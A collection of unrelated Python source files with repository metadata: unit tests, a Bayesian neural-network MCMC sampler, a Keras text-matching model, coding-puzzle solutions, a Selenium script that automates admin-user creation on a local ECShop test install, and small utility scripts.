if __name__ == "__main__":
renderMap(loadMap('test.map'))
| true
|
e2443de536e43569e62899b4a6693cab13c540a6
|
Python
|
mozaiques/zombase
|
/tests/test_config.py
|
UTF-8
| 1,915
| 2.65625
| 3
|
[
"MIT"
] |
permissive
|
# -*- coding: utf-8 -*-
import os
import tempfile
import unittest
from zombase import config
class AbstractTestConfig(object):
def test_common(self):
self.assertEqual(self.a_config['KEY_ONE'], 'blaé')
self.assertEqual(self.a_config['KEY_TWO'], 12)
with self.assertRaises(config.ConfigError):
self.a_config['key_three']
with self.assertRaises(config.ConfigError):
self.a_config['KEY_FOUR']
def tearDown(self):
del self.a_config
class TestDictConfig(unittest.TestCase, AbstractTestConfig):
def setUp(self):
test_dict = {
'KEY_ONE': 'blaé',
'KEY_TWO': 12,
'key_three': 'non_capital'
}
self.a_config = config.Config()
self.a_config.from_dict(test_dict)
class TestObjectConfig(unittest.TestCase, AbstractTestConfig):
def setUp(self):
class DummyObject(object):
pass
test_object = DummyObject()
setattr(test_object, 'KEY_ONE', 'blaé')
setattr(test_object, 'KEY_TWO', 12)
setattr(test_object, 'key_three', 'non_capital')
self.a_config = config.Config()
self.a_config.from_object(test_object)
class TestFileConfig(unittest.TestCase, AbstractTestConfig):
def setUp(self):
self.test_file = tempfile.NamedTemporaryFile(mode='wb', delete=False)
self.test_file.write(u'# -*- coding: utf-8 -*-\n'.encode('utf-8'))
self.test_file.write(u'KEY_ONE = "blaé"\n'.encode('utf-8'))
self.test_file.write(u'KEY_TWO = 12\n'.encode('utf-8'))
self.test_file.write(u'key_three = "non_capital"\n'.encode('utf-8'))
self.test_file.close()
self.a_config = config.Config()
self.a_config.from_pyfile(self.test_file.name)
def tearDown(self):
del self.a_config
os.remove(self.test_file.name)
del self.test_file
| true
|
8bd194e3f98c1f4395c5d200013cef8053f964f8
|
Python
|
rohitash-chandra/ld_bnn_pc
|
/ld_bnn_pc.py
|
UTF-8
| 18,430
| 2.65625
| 3
|
[] |
no_license
|
# i/usr/bin/python
import matplotlib.pyplot as plt
import numpy as np
import random
import time
from scipy.stats import multivariate_normal
from scipy.stats import norm
import math
import os
from expdata import setexperimentdata
import sys
# An example of a class
class Network:
def __init__(self, Topo, Train, Test, learn_rate):
self.Top = Topo # NN topology [input, hidden, output]
self.TrainData = Train
self.TestData = Test
np.random.seed()
self.lrate = learn_rate
self.W1 = np.random.randn(self.Top[0], self.Top[1]) / np.sqrt(self.Top[0])
self.B1 = np.random.randn(1, self.Top[1]) / np.sqrt(self.Top[1]) # bias first layer
self.W2 = np.random.randn(self.Top[1], self.Top[2]) / np.sqrt(self.Top[1])
self.B2 = np.random.randn(1, self.Top[2]) / np.sqrt(self.Top[1]) # bias second layer
self.hidout = np.zeros((1, self.Top[1])) # output of first hidden layer
self.out = np.zeros((1, self.Top[2])) # output last layer
def sigmoid(self, x):
return 1 / (1 + np.exp(-x))
def sampleEr(self, actualout):
error = np.subtract(self.out, actualout)
sqerror = np.sum(np.square(error)) / self.Top[2]
return sqerror
def ForwardPass(self, X):
z1 = X.dot(self.W1) - self.B1
self.hidout = self.sigmoid(z1) # output of first hidden layer
z2 = self.hidout.dot(self.W2) - self.B2
self.out = self.sigmoid(z2) # output second hidden layer
def BackwardPass(self, Input, desired):
out_delta = (desired - self.out) * (self.out * (1 - self.out))
hid_delta = out_delta.dot(self.W2.T) * (self.hidout * (1 - self.hidout))
#self.W2 += (self.hidout.T.dot(out_delta) * self.lrate)
#self.B2 += (-1 * self.lrate * out_delta)
#self.W1 += (Input.T.dot(hid_delta) * self.lrate)
#self.B1 += (-1 * self.lrate * hid_delta)
layer = 1 # hidden to output
for x in xrange(0, self.Top[layer]):
for y in xrange(0, self.Top[layer + 1]):
self.W2[x, y] += self.lrate * out_delta[y] * self.hidout[x]
for y in xrange(0, self.Top[layer + 1]):
self.B2[y] += -1 * self.lrate * out_delta[y]
layer = 0 # Input to Hidden
for x in xrange(0, self.Top[layer]):
for y in xrange(0, self.Top[layer + 1]):
self.W1[x, y] += self.lrate * hid_delta[y] * Input[x]
for y in xrange(0, self.Top[layer + 1]):
self.B1[y] += -1 * self.lrate * hid_delta[y]
def decode(self, w):
w_layer1size = self.Top[0] * self.Top[1]
w_layer2size = self.Top[1] * self.Top[2]
w_layer1 = w[0:w_layer1size]
self.W1 = np.reshape(w_layer1, (self.Top[0], self.Top[1]))
w_layer2 = w[w_layer1size:w_layer1size + w_layer2size]
self.W2 = np.reshape(w_layer2, (self.Top[1], self.Top[2]))
self.B1 = w[w_layer1size + w_layer2size:w_layer1size + w_layer2size + self.Top[1]]
self.B2 = w[w_layer1size + w_layer2size + self.Top[1]:w_layer1size + w_layer2size + self.Top[1] + self.Top[2]]
def encode(self):
w1 = self.W1.ravel()
w2 = self.W2.ravel()
w = np.concatenate([w1, w2, self.B1, self.B2])
return w
def langevin_gradient(self, data, w, depth): # BP with SGD (Stocastic BP)
self.decode(w) # method to decode w into W1, W2, B1, B2.
size = data.shape[0]
Input = np.zeros((1, self.Top[0])) # temp hold input
Desired = np.zeros((1, self.Top[2]))
fx = np.zeros(size)
for i in xrange(0, depth):
for i in xrange(0, size):
pat = i
Input = data[pat, 0:self.Top[0]]
Desired = data[pat, self.Top[0]:]
self.ForwardPass(Input)
self.BackwardPass(Input, Desired)
w_updated = self.encode()
return w_updated
def evaluate_proposal(self, data, w ): # BP with SGD (Stocastic BP)
self.decode(w) # method to decode w into W1, W2, B1, B2.
size = data.shape[0]
Input = np.zeros((1, self.Top[0])) # temp hold input
Desired = np.zeros((1, self.Top[2]))
fx = np.zeros((size,self.Top[2]))
for i in xrange(0, size): # to see what fx is produced by your current weight update
Input = data[i, 0:self.Top[0]]
self.ForwardPass(Input)
fx[i] = self.out
return fx
# --------------------------------------------------------------------------
def covert_time(secs):
if secs >= 60:
mins = str(secs/60)
secs = str(secs%60)
else:
secs = str(secs)
mins = str(00)
if len(mins) == 1:
mins = '0'+mins
if len(secs) == 1:
secs = '0'+secs
return [mins, secs]
# -------------------------------------------------------------------
class MCMC:
def __init__(self, samples, traindata, testdata, topology):
self.samples = samples # NN topology [input, hidden, output]
self.topology = topology # max epocs
self.traindata = traindata #
self.testdata = testdata
# ----------------
def rmse(self, predictions, targets):
return np.sqrt(((predictions - targets) ** 2).mean())
def likelihood_func(self, neuralnet, data, w, tausq):
y = data[:, self.topology[0]:]
fx = neuralnet.evaluate_proposal(data, w)
rmse = self.rmse(fx, y)
loss = -0.5 * np.log(2 * math.pi * tausq) - 0.5 * np.square(y - fx) / tausq
return [np.sum(loss), fx, rmse]
def prior_likelihood(self, sigma_squared, nu_1, nu_2, w, tausq):
h = self.topology[1] # number hidden neurons
d = self.topology[0] # number input neurons
part1 = -1 * ((d * h + h + 2) / 2) * np.log(sigma_squared)
part2 = 1 / (2 * sigma_squared) * (sum(np.square(w)))
log_loss = part1 - part2 - (1 + nu_1) * np.log(tausq) - (nu_2 / tausq)
return log_loss
def sampler(self, w_limit, tau_limit, file):
start = time.time()
# ------------------- initialize MCMC
testsize = self.testdata.shape[0]
trainsize = self.traindata.shape[0]
samples = self.samples
self.sgd_depth = 1
x_test = np.linspace(0, 1, num=testsize)
x_train = np.linspace(0, 1, num=trainsize)
netw = self.topology # [input, hidden, output]
y_test = self.testdata[:, netw[0]:]
y_train = self.traindata[:, netw[0]:]
# print y_train.shape
# print y_test.shape
w_size = (netw[0] * netw[1]) + (netw[1] * netw[2]) + netw[1] + netw[2] # num of weights and bias
pos_w = np.ones((samples, w_size)) # posterior of all weights and bias over all samples
pos_tau = np.ones((samples, 1))
fxtrain_samples = np.ones((samples, trainsize, netw[2])) # fx of train data over all samples
fxtest_samples = np.ones((samples, testsize, netw[2])) # fx of test data over all samples
rmse_train = np.zeros(samples)
rmse_test = np.zeros(samples)
w = np.random.randn(w_size)
w_proposal = np.random.randn(w_size)
#step_w = 0.05; # defines how much variation you need in changes to w
#step_eta = 0.2; # exp 0
step_w = w_limit # defines how much variation you need in changes to w
step_eta = tau_limit #exp 1
# --------------------- Declare FNN and initialize
learn_rate = 0.5
neuralnet = Network(self.topology, self.traindata, self.testdata, learn_rate)
# print 'evaluate Initial w'
pred_train = neuralnet.evaluate_proposal(self.traindata, w)
pred_test = neuralnet.evaluate_proposal(self.testdata, w)
eta = np.log(np.var(pred_train - y_train))
tau_pro = np.exp(eta)
sigma_squared = 25
nu_1 = 0
nu_2 = 0
sigma_diagmat = np.zeros((w_size, w_size)) # for Equation 9 in Ref [Chandra_ICONIP2017]
np.fill_diagonal(sigma_diagmat, step_w)
delta_likelihood = 0.5 # an arbitrary position
prior_current = self.prior_likelihood(sigma_squared, nu_1, nu_2, w, tau_pro) # takes care of the gradients
[likelihood, pred_train, rmsetrain] = self.likelihood_func(neuralnet, self.traindata, w, tau_pro)
[likelihood_ignore, pred_test, rmsetest] = self.likelihood_func(neuralnet, self.testdata, w, tau_pro)
# print likelihood
naccept = 0
# print 'begin sampling using mcmc random walk'
# plt.plot(x_train, y_train)
# plt.plot(x_train, pred_train)
# plt.title("Plot of Data vs Initial Fx")
# plt.savefig('mcmcresults/begin.png')
# plt.clf()
#plt.plot(x_train, y_train)
for i in range(samples - 1):
w_gd = neuralnet.langevin_gradient(self.traindata, w.copy(), self.sgd_depth) # Eq 8
print(sum(w_gd))
w_proposal = w_gd + np.random.normal(0, step_w, w_size) # Eq 7
w_prop_gd = neuralnet.langevin_gradient(self.traindata, w_proposal.copy(), self.sgd_depth)
# print(multivariate_normal.pdf(w, w_prop_gd, sigma_diagmat),multivariate_normal.pdf(w_proposal, w_gd, sigma_diagmat))
diff_prop = np.log(multivariate_normal.pdf(w, w_prop_gd, sigma_diagmat) - np.log(multivariate_normal.pdf(w_proposal, w_gd, sigma_diagmat)))
eta_pro = eta + np.random.normal(0, step_eta, 1)
tau_pro = math.exp(eta_pro)
[likelihood_proposal, pred_train, rmsetrain] = self.likelihood_func(neuralnet, self.traindata, w_proposal,
tau_pro)
[likelihood_ignore, pred_test, rmsetest] = self.likelihood_func(neuralnet, self.testdata, w_proposal,
tau_pro)
# likelihood_ignore refers to parameter that will not be used in the alg.
prior_prop = self.prior_likelihood(sigma_squared, nu_1, nu_2, w_proposal,
tau_pro) # takes care of the gradients
diff_prior = prior_prop - prior_current
diff_likelihood = likelihood_proposal - likelihood
diff = min(700, diff_prior + diff_likelihood + diff_prop)
# print()
# print(diff, i )
mh_prob = min(1, math.exp(diff))
# print(mh_prob)
u = random.uniform(0, 1)
if u < mh_prob:
# Update position
# print i, ' is accepted sample'
naccept += 1
likelihood = likelihood_proposal
prior_current = prior_prop
w = w_proposal
eta = eta_pro
elapsed_time = ":".join(covert_time(int(time.time()-start)))
# sys.stdout.write('\r' + file + ' : ' + str("{:.2f}".format(float(i) / (samples - 1) * 100)) + '% complete....'+" time elapsed: " + elapsed_time)
# print likelihood, prior_current, diff_prop, rmsetrain, rmsetest, w, 'accepted'
#print w_proposal, 'w_proposal'
#print w_gd, 'w_gd'
#print w_prop_gd, 'w_prop_gd'
pos_w[i + 1,] = w_proposal
pos_tau[i + 1,] = tau_pro
fxtrain_samples[i + 1,] = pred_train
fxtest_samples[i + 1,] = pred_test
rmse_train[i + 1,] = rmsetrain
rmse_test[i + 1,] = rmsetest
#plt.plot(x_train, pred_train)
else:
pos_w[i + 1,] = pos_w[i,]
pos_tau[i + 1,] = pos_tau[i,]
fxtrain_samples[i + 1,] = fxtrain_samples[i,]
fxtest_samples[i + 1,] = fxtest_samples[i,]
rmse_train[i + 1,] = rmse_train[i,]
rmse_test[i + 1,] = rmse_test[i,]
# print i, 'rejected and retained'
# sys.stdout.write('\r' + file + ' : 100% ..... Total Time: ' + ":".join(covert_time(int(time.time()-start))))
# print naccept, ' num accepted'
# print naccept / (samples * 1.0), '% was accepted'
accept_ratio = naccept / (samples * 1.0) * 100
# plt.title("Plot of Accepted Proposals")
# plt.savefig('mcmcresults/proposals.png')
# plt.savefig('mcmcresults/proposals.svg', format='svg', dpi=600)
# plt.clf()
return (pos_w, pos_tau, fxtrain_samples, fxtest_samples, x_train, x_test, rmse_train, rmse_test, accept_ratio)
def main():
filenames = ["Iris", "Wine", "Cancer", "Heart", "CreditApproval", "Baloon", "TicTac", "Ions", "Zoo",
"Lenses", "Balance"]
problemlist = np.array(range(11))
input = np.array([4, 13, 9, 13, 15, 4, 9, 34, 16, 4, 4])
hidden = np.array([6, 6, 6, 16, 20, 5, 30, 8, 6, 5, 8])
output = np.array([2, 3, 1, 1, 1, 1, 1, 1, 7, 3, 3])
samplelist = [5000, 8000, 10000, 20000, 15000, 5000, 20000, 5000, 3000, 5000, 2000]
x = 3
filetrain = open('Results/train.txt', 'r')
filetest = open('Results/test.txt', 'r')
filestdtr = open('Results/std_tr.txt','r')
filestdts = open('Results/std_ts.txt', 'r')
train_accs = np.loadtxt(filetrain)
test_accs = np.loadtxt(filetest)
train_stds = np.loadtxt(filestdtr)
test_stds = np.loadtxt(filestdts)
filetrain.close()
filetest.close()
filestdtr.close()
filestdts.close()
if x == 3:
w_limit = 0.02
tau_limit = 0.2
#if x == 4:
#w_limit = 0.02
#tau_limit = 0.1
for problem in []:
#if os.path.isfile("Results/"+filenames[problem]+"_rmse.txt"):
# print filenames[problem]
# continur
[traindata, testdata, baseNet] = setexperimentdata(problem)
topology = [input[problem], hidden[problem], output[problem]]
random.seed(time.time())
numSamples = samplelist[problem] # need to decide yourself
mcmc = MCMC(numSamples, traindata, testdata, topology) # declare class
[pos_w, pos_tau, fx_train, fx_test, x_train, x_test, rmse_train, rmse_test, accept_ratio] = mcmc.sampler(w_limit, tau_limit, filenames[problem])
print '\nsucessfully sampled: '+ str(accept_ratio)+ ' samples accepted'
burnin = 0.1 * numSamples # use post burn in samples
pos_w = pos_w[int(burnin):, ]
pos_tau = pos_tau[int(burnin):, ]
print("fx shape:"+str(fx_test.shape))
print("fx_train shape:"+ str(fx_train.shape))
fx_mu = fx_test.mean(axis=0)
fx_high = np.percentile(fx_test, 95, axis=0)
fx_low = np.percentile(fx_test, 5, axis=0)
fx_mu_tr = fx_train.mean(axis=0)
fx_high_tr = np.percentile(fx_train, 95, axis=0)
fx_low_tr = np.percentile(fx_train, 5, axis=0)
pos_w_mean = pos_w.mean(axis=0)
# np.savetxt(outpos_w, pos_w_mean, fmt='%1.5f')
rmse_tr = np.mean(rmse_train[int(burnin):])
rmsetr_std = np.std(rmse_train[int(burnin):])
rmse_tes = np.mean(rmse_test[int(burnin):])
rmsetest_std = np.std(rmse_test[int(burnin):])
# print rmse_tr, rmsetr_std, rmse_tes, rmsetest_std
# np.savetxt(outres, (rmse_tr, rmsetr_std, rmse_tes, rmsetest_std, accept_ratio), fmt='%1.5f')
ytestdata = testdata[:, input[problem]:]
ytraindata = traindata[:, input[problem]:]
train_acc = []
test_acc = []
for fx in fx_train:
count = 0
for index in range(fx.shape[0]):
if np.allclose(fx[index],ytraindata[index],atol = 0.2):
count += 1
train_acc.append(float(count)/fx.shape[0]*100)
for fx in fx_test:
count = 0
for index in range(fx.shape[0]):
if np.allclose(fx[index],ytestdata[index],atol = 0.5):
count += 1
test_acc.append(float(count)/fx.shape[0]*100)
train_acc = np.array(train_acc[int(burnin):])
train_std = np.std(train_acc[int(burnin):])
test_acc = np.array(test_acc[int(burnin):])
test_std = np.std(test_acc[int(burnin):])
train_acc_mu = train_acc.mean()
test_acc_mu = test_acc.mean()
train_accs[problem] = train_acc_mu
test_accs[problem] = test_acc_mu
train_stds[problem] = train_std
test_stds[problem] = test_std
testResults = np.c_[ytestdata, fx_mu, fx_high, fx_low]
trainResults = np.c_[ytraindata, fx_mu_tr, fx_high_tr, fx_low_tr]
# Write RMSE to
with open("Results/" +
filenames[problem] + "_rmse" + ".txt", 'w') as fil:
rmse = [rmse_tr, rmsetr_std, rmse_tes, rmsetest_std]
rmse = "\t".join(list(map(str, rmse))) + "\n"
fil.write(rmse)
n_groups = len(filenames)
fig, ax = plt.subplots()
index = np.arange(n_groups)
bar_width = 0.2
opacity = 0.8
capsize = 3
filetrain = open('Results/train.txt', 'w+')
filetest = open('Results/test.txt', 'w+')
filestdtr = open('Results/std_tr.txt','w+')
filestdts = open('Results/std_ts.txt', 'w+')
np.savetxt(filetrain, train_accs, fmt='%2.2f')
np.savetxt(filestdtr, train_stds, fmt='%2.2f')
np.savetxt(filetest, test_accs, fmt='%2.2f')
np.savetxt(filestdts, test_stds, fmt='%2.2f')
filetrain.close()
filetest.close()
filestdtr.close()
filestdts.close()
print(train_accs)
plt.bar(index + float(bar_width)/2, train_accs, bar_width,
alpha = opacity,
error_kw = dict(elinewidth=1, ecolor='r'),
yerr = train_stds,
color = 'c',
label = 'train')
plt.bar(index + float(bar_width)/2 + bar_width, test_accs, bar_width,
alpha = opacity,
error_kw = dict(elinewidth=1, ecolor='g'),
yerr = test_stds,
color = 'b',
label = 'test')
plt.xlabel('Datasets')
plt.ylabel('Accuracy')
plt.xticks(index+bar_width, filenames, rotation=70)
plt.legend()
plt.tight_layout()
plt.savefig('barplt.png')
plt.show()
if __name__ == "__main__": main()
| true
|
70b459dec76842c983f4bb9e12983abcbe5737d1
|
Python
|
yuseungwoo/baekjoon
|
/1076.py
|
UTF-8
| 326
| 3.609375
| 4
|
[] |
no_license
|
# coding: utf-8
color = ['black', 'brown', 'red', 'orange', 'yellow', 'green', 'blue', 'violet', 'grey',
'white']
input_list = []
for _ in range(3):
input_list.append(input())
num = ""
num += str(color.index(input_list[0])) + str(color.index(input_list[1]))
print(int(num) * 10**color.index(input_list[2]))
| true
|
d3a39f7e23511b50e718a68b24fe9ed528e515fe
|
Python
|
ramjet-labs/aioredis
|
/tests/coerced_keys_dict_test.py
|
UTF-8
| 1,201
| 2.8125
| 3
|
[
"MIT"
] |
permissive
|
import pytest
from aioredis.util import coerced_keys_dict
def test_simple():
d = coerced_keys_dict()
assert d == {}
d = coerced_keys_dict({b'a': 'b', b'c': 'd'})
assert 'a' in d
assert b'a' in d
assert 'c' in d
assert b'c' in d
assert d == {b'a': 'b', b'c': 'd'}
def test_invalid_init():
d = coerced_keys_dict({'foo': 'bar'})
assert d == {'foo': 'bar'}
assert 'foo' not in d
assert b'foo' not in d
with pytest.raises(KeyError):
d['foo']
with pytest.raises(KeyError):
d[b'foo']
d = coerced_keys_dict()
d.update({'foo': 'bar'})
assert d == {'foo': 'bar'}
assert 'foo' not in d
assert b'foo' not in d
with pytest.raises(KeyError):
d['foo']
with pytest.raises(KeyError):
d[b'foo']
def test_valid_init():
d = coerced_keys_dict({b'foo': 'bar'})
assert d == {b'foo': 'bar'}
assert 'foo' in d
assert b'foo' in d
assert d['foo'] == 'bar'
assert d[b'foo'] == 'bar'
d = coerced_keys_dict()
d.update({b'foo': 'bar'})
assert d == {b'foo': 'bar'}
assert 'foo' in d
assert b'foo' in d
assert d['foo'] == 'bar'
assert d[b'foo'] == 'bar'
| true
|
e4a00ef6b98528f42b4d4f8447bcb62ce46829fd
|
Python
|
jiniaoxu/matchzoo-lite
|
/matchzoo/models/conv_highway.py
|
UTF-8
| 8,447
| 2.734375
| 3
|
[
"Apache-2.0"
] |
permissive
|
"""An implementation of Conv-Highway Model."""
import typing
import keras
from keras import backend as K
from matchzoo import engine
from matchzoo import preprocessors
class ConvHighway(engine.BaseModel):
"""
ConvHighway Model.
Examples:
>>> model = ConvHighway()
>>> model.params['encode_filters'] = 128
>>> model.params['encode_kernel_sizes'] = [3, 4, 5]
>>> model.params['decode_filters'] = 128
>>> model.params['decode_kernel_size'] = 3
>>> model.params['conv_activation_func'] = 'relu'
>>> model.params['pool_size'] = 2
>>> model.params['mlp_num_layers'] = 1
>>> model.params['mlp_num_units'] = 200
>>> model.params['mlp_num_fan_out'] = 100
>>> model.params['mlp_activation_func'] = 'relu'
>>> model.params['dropout_rate'] = 0.5
>>> model.guess_and_fill_missing_params(verbose=0)
>>> model.build()
"""
@classmethod
def get_default_params(cls) -> engine.ParamTable:
""":return: model default parameters."""
params = super().get_default_params(
with_embedding=True,
with_multi_layer_perceptron=True
)
params['optimizer'] = 'adam'
params.add(engine.Param(name='encode_filters', value=128,
desc="The filter size of each convolution "
"blocks for encode."))
params.add(engine.Param(name='encode_kernel_sizes', value=[3],
desc="The kernel size of each convolution "
"blocks for the encode."))
params.add(engine.Param(name='decode_filters', value=128,
desc="The filter size of each convolution "
"blocks for decode."))
params.add(engine.Param(name='decode_kernel_size', value=3,
desc="The kernel size of each convolution "
"blocks for the decode."))
params.add(engine.Param(name='conv_activation_func', value='relu',
desc="The activation function in the "
"convolution layer."))
params.add(engine.Param(name='pool_size', value=4,
desc="pool size of max pooling"
"pool size of max pooling"))
params.add(engine.Param(
name='padding',
value='same',
hyper_space=engine.hyper_spaces.choice(
['same', 'valid', 'causal']),
desc="The padding mode in the convolution layer. It should be one"
"of `same`, `valid`, and `causal`."
))
params.add(engine.Param(
'dropout_rate', 0.0,
hyper_space=engine.hyper_spaces.quniform(
low=0.0, high=0.8, q=0.01),
desc="The dropout rate."
))
return params
def build(self):
"""
Build model structure.
ConvHighway use Siamese arthitecture.
"""
input_left, input_right = self._make_inputs()
mask_left = keras.layers.Lambda(lambda x: K.cast(x, K.tf.bool))(input_left)
mask_right = keras.layers.Lambda(lambda x: K.cast(x, K.tf.bool))(input_right)
embedding = self._make_embedding_layer()
embed_left = embedding(input_left)
embed_right = embedding(input_right)
# encode
encode_left = self._conv_highway_block(
embed_left,
self._params['encode_filters'],
self._params['encode_kernel_sizes'],
self._params['padding'],
self._params['conv_activation_func']
)
encode_right = self._conv_highway_block(
embed_right,
self._params['encode_filters'],
self._params['encode_kernel_sizes'],
self._params['padding'],
self._params['conv_activation_func']
)
attention_layer = keras.layers.Lambda(ConvHighway.bi_attention)
attn = attention_layer([encode_left, encode_right, mask_left, mask_right])
# decode
decode = self._conv_pool_block(
attn,
self._params['decode_filters'],
self._params['decode_kernel_size'],
self._params['padding'],
self._params['conv_activation_func'],
self._params['pool_size']
)
output = keras.layers.Flatten()(decode)
dropout = keras.layers.Dropout(
rate=self._params['dropout_rate'])(output)
mlp = self._make_multi_layer_perceptron_layer()(dropout)
inputs = [input_left, input_right]
x_out = self._make_output_layer()(mlp)
self._backend = keras.Model(inputs=inputs, outputs=x_out)
def _conv_pool_block(
self,
input_: typing.Any,
filters: int,
kernel_size: int,
padding: str,
conv_activation_func: str,
pool_size: int
) -> typing.Any:
output = keras.layers.Conv1D(
filters,
kernel_size,
padding=padding,
activation=conv_activation_func
)(input_)
output = keras.layers.MaxPooling1D(pool_size=pool_size)(output)
return output
def _conv_highway_block(
self,
input_: typing.Any,
filters: int,
kernel_sizes: list,
padding: str,
conv_activation_func: str,
) -> typing.Any:
inputs = keras.layers.Dense(filters)(input_)
shortconn = inputs
for kidx, kernel_size in enumerate(kernel_sizes, 1):
if kidx % 2 == 0:
inputs = keras.layers.Add()([inputs, shortconn])
shortconn = inputs
else:
H = keras.layers.Conv1D(
filters,
kernel_size,
padding=padding,
activation=conv_activation_func
)(inputs)
T = keras.layers.Conv1D(
filters,
kernel_size,
padding=padding,
activation='sigmoid'
)(inputs)
inputs = keras.layers.Add()([
keras.layers.Multiply()([H, T]),
keras.layers.Multiply()([inputs, keras.layers.Lambda(lambda x: 1.0-x)(T)])
])
return inputs
@staticmethod
def bi_attention(
tensors: typing.Any
) -> typing.Any:
p_enc, q_enc, p_mask, q_mask = tensors
score = ConvHighway.bilinear(p_enc, q_enc)
q_mask_ex = K.expand_dims(q_mask, 1) # batch x 1 x q_len
p_mask_ex = K.expand_dims(p_mask, 1) # batch x 1 x p_len
score_ = K.softmax(
K.expand_dims(
K.tf.reduce_max(
ConvHighway.mask_logits(score, p_mask_ex), axis=1), axis=1), -1) # batch x 1 x p_len
#score_x = K.tf.tile(score_, [1, K.tf.shape(p_enc)[1], 1])
score_t = K.softmax(
ConvHighway.mask_logits(K.tf.transpose(score, (0, 2, 1)), q_mask_ex)
) # batch x p_len x q_len
p2q = K.batch_dot(score_, p_enc) # batch x 1 x embedding_size
q2p = K.batch_dot(score_t, q_enc) # batch x p_len x embedding_size
concat = K.tf.concat([p_enc, q2p, p_enc*p2q, p_enc*q2p], axis=-1)
return concat
@staticmethod
def mask_logits(
inputs: typing.Any,
mask: typing.Any
) -> typing.Any:
mask = K.cast(mask, K.tf.float32)
return inputs * mask + 1e-12 * (1. - mask)
@staticmethod
def bilinear(
p_enc: typing.Any,
q_enc: typing.Any
) -> typing.Any:
"""
Args:
p_enc: (batch_size, p_len, embed_size)
q_enc: (batch_size, q_len, embed_size)
Ouput:
(batch_size, p_len, q_len)
"""
p = K.tf.transpose(p_enc, (0, 2, 1))
with K.tf.variable_scope("attn_weight", reuse=K.tf.AUTO_REUSE):
hidden_dim = q_enc.get_shape()[-1]
attn_W = K.tf.get_variable("AttnW",
shape=[hidden_dim, hidden_dim],
dtype=K.tf.float32)
w_q = K.dot(q_enc, attn_W)
out = K.batch_dot(w_q, p) # batch x q_len x p_len
return out
| true
|
d1e000c81aa47afcd2a295070019c7caa37b24b3
|
Python
|
chahtk/algostudy
|
/yang/20210309/3273.py
|
UTF-8
| 315
| 3.046875
| 3
|
[] |
no_license
|
import sys
n=int(sys.stdin.readline())
k=list(map(int,sys.stdin.readline().split()))
x=int(sys.stdin.readline())
k.sort()
count=0
left=0
right=len(k)-1
while left<right:
tmp=k[left]+k[right]
if tmp == x :
count += 1
if tmp < x :
left += 1
continue
right -= 1
print(count)
| true
|
a5db23ea93a848c5f57c89db1b3dad1a3dc15fd3
|
Python
|
rockymoran/py_work_scripts
|
/misc/adventure.py
|
UTF-8
| 763
| 3.8125
| 4
|
[] |
no_license
|
# rocco's adventure game
class Player:
def __init__(self):
self.p_name = input("Name? ")
self.stamina = 100
self.inventory = Inventory()
class Inventory:
def __init__(self):
self.equipment = "fishing pole"
self.items = ""
class Level:
def __init__(self):
self.level = ""
def welcome():
print("Welcome to this cool game.")
print("Let's get started.")
new_player = Player()
return new_player
def main():
continue_playing = True
new_player = welcome()
while continue_playing:
print(new_player.__dict__)
print(new_player.inventory.__dict__)
continue_playing = False
return print("Thanks for playing!")
if __name__ == '__main__':
main()
| true
|
892df9c818ab97d731b782f8d8c3f8fe5580ea56
|
Python
|
lisa906673062/webauto-1
|
/ECShop_qxgl_glylb_002.py
|
UTF-8
| 2,151
| 2.671875
| 3
|
[] |
no_license
|
'''
新增管理员
分配权限
'''
from selenium import webdriver
import time
from selenium.webdriver.common.by import By
driver = webdriver.Chrome()
driver.maximize_window()
url = 'http://192.168.1.120/upload/admin'#后台
driver.get(url=url)
driver.implicitly_wait(10)#隐式等待
time.sleep(2)
user = 'admin'
pwd = 'banxian123'
driver.find_element(By.NAME,'username').clear()
driver.find_element(By.NAME,'username').send_keys(user) #输用户名
driver.find_element(By.NAME,'password').clear()
driver.find_element(By.NAME,'password').send_keys(pwd) #输密码
driver.find_element(By.NAME,'remember').click() #勾选保存密码
driver.find_element(By.CLASS_NAME,'button').click() #点击登录
time.sleep(2)
#权限管理-管理员列表
driver.switch_to.frame("menu-frame")
driver.find_element(By.XPATH,'//ul[@id="menu-ul"]/li[8]').click()
driver.find_element(By.XPATH,'//ul[@id="menu-ul"]/li[8]/ul/li[1]/a').click()
driver.switch_to.default_content()
#新增管理员
driver.switch_to.frame("main-frame")
driver.find_element(By.XPATH,'/html/body/h1/span[1]/a').click()
#输入管理员信息
username = "zho3l1ia1"
emil = "906312a01@qq.com"
pwd1 = "abc123"
pwd2 = "abc123"
driver.find_element(By.NAME,'user_name').clear()
driver.find_element(By.NAME,'user_name').send_keys(username)#用户名
driver.find_element(By.NAME,'email').clear()
driver.find_element(By.NAME,'email').send_keys(emil)#邮箱
driver.find_element(By.NAME,'password').clear()
driver.find_element(By.NAME,'password').send_keys(pwd1)#密码
driver.find_element(By.NAME,'pwd_confirm').clear()
driver.find_element(By.NAME,'pwd_confirm').send_keys(pwd2)#确认密码
driver.find_element(By.CSS_SELECTOR,'input[type="submit"]').click()#确认
time.sleep(3)
driver.save_screenshot("D:\workspace\img\qxgl_glylb_002_新增管理用户.png")
#分配权限
ele = driver.find_elements(By.NAME,'chkGroup')
ele[0].click()
ele[1].click()
ele[2].click()
ele[3].click()
time.sleep(1)
driver.find_element(By.NAME,'Submit').click()
driver.save_screenshot("D:\workspace\img\qxgl_glylb_002_权限分配.png")
driver.switch_to.default_content()
#退出
driver.quit()
| true
|
7c029b32a98ae130cd64185969ec50ae09d65dcc
|
Python
|
kanael/omnomnom
|
/munch.py
|
UTF-8
| 1,170
| 2.984375
| 3
|
[] |
no_license
|
import json, glob, os
def parse_price(s):
return float(str(s).replace('₪','').strip())
def munch_restaurants():
restaurants = []
for restaurant_file in glob.glob("scraps/restaurants/*"):
menu_file = restaurant_file.replace("restaurants", "menus")
restaurant_id = restaurant_file.replace("restaurants", "")
restaurant_info = json.load(open(restaurant_file))
print (restaurant_id)
if not os.path.isfile(menu_file):
print ("no menu")
continue
restaurant_info["id"] = restaurant_id
restaurant_info["dishes"] = []
restaurants.append(restaurant_info)
menu_info = json.load(open(menu_file))
dishes = menu_info["dishes"]
if (len(set([d["name"] for d in dishes])) != len(dishes)):
print ("duplicate dishes")
continue
for i, dish in enumerate(dishes):
print("#%s" % (i, ))
dish["price"] = parse_price(dish["price"])
dish["restaurant_id"] = restaurant_id
restaurant_info["dishes"].append(dish)
return restaurants
json.dump(munch_restaurants(), open("all.json", "w"))
| true
|
9054b84df3d7c88bbe6e42d41d55c06a4c549ad2
|
Python
|
KLyudmyla/xml_analyzer
|
/src/xml_analyzer.py
|
UTF-8
| 3,895
| 2.953125
| 3
|
[] |
no_license
|
import sys
import bs4
import logging
from bs4 import BeautifulSoup
